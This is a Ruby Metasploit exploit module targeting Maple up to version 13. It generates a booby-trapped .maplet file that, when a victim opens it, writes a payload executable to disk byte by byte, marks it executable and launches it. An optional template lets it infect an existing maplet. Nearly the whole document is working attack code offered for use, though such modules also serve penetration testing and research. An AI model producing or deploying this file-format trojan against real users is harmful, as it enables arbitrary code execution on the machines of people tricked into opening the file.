##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Maple Maplet File Creation and Command Execution',
      'Description'    => %q{
          This module harnesses Maple's ability to create files and execute commands
        automatically when opening a Maplet. All versions up to 13 are suspected
        vulnerable. Testing was conducted with version 13 on Windows. Standard security
        settings prevent code from running in a normal maple worksheet without user
        interaction, but those setting do not prevent code in a Maplet from running.

        In order for the payload to be executed, an attacker must convince someone to
        open a specially modified .maplet file with Maple. By doing so, an attacker can
        execute arbitrary code as the victim user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'scriptjunkie'
        ],
      'References'     =>
        [
          [ 'OSVDB', '64541'],
          [ 'URL', 'http://www.maplesoft.com/products/maple/' ]
        ],
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => '',
          'DisableNops' => true,
#					'Compat'      =>
#						{
#							'PayloadType' => 'cmd',
#							'RequiredCmd' => 'generic perl telnet',
#						}
        },
      'Platform'       => %w{ win linux unix },
      'Targets'        =>
        [
          [ 'Windows',
            {
              'Arch'      => ARCH_X86,
              'Platform' => 'win'
            }
          ],

          [ 'Windows X64',
            {
              'Arch'      => ARCH_X64,
              'Platform' => 'win'
            }
          ],

          [ 'Linux',
            {
              'Arch'      => ARCH_X86,
              'Platform' => 'linux'
            }
          ],

          [ 'Linux X64',
            {
              'Arch'      => ARCH_X64,
              'Platform' => 'linux'
            }
          ],

          ['Universal CMD',
            {
              'Arch'      => ARCH_CMD,
              'Platform'       => %w{ linux unix win }
            }
          ]

        ],
      'DisclosureDate' => 'Apr 26 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),
        OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),
      ])

  end


  def exploit
    cmd = ''
    content = ''
    if target['Arch'] != ARCH_CMD
      #Get payload as executable on whatever platform
      binary = generate_payload_exe

      #Get filename and random variable name for file handle in script
      fname = rand_text_alpha(3+rand(15))
      if target['Platform'] == 'win'
        fname << ".exe"
      end
      fhandle = rand_text_alpha(3+rand(15))

      #Write maple commands to create executable
      content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"
      exe = binary.unpack('C*')

      content << "writebytes(#{fhandle},[#{exe[0]}"
      lines = []
      1.upto(exe.length-1) do |byte|
        if(byte % 100 == 0)
          lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"
        else
          lines.push ",#{exe[byte]}"
        end
      end
      content << lines.join("") + "]);\r\n"

      content << "fclose(" + fhandle + ");\n"
      #Write command to be executed
      if target['Platform'] != 'win'
        content << "system(\"chmod a+x #{fname}\");\n"
      end
      content << "system[launch](\"#{fname}\");\n"
    else
      content << "system(\"#{payload.encoded}\");\n"
    end

    #Then put the rest of the original maplet
    if datastore['TEMPLATE'] != ''
      File.open(datastore['TEMPLATE'], 'rb') do |fd|
        content << fd.read( File.size(datastore['TEMPLATE']) )
      end
    end

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(content)
  end
end
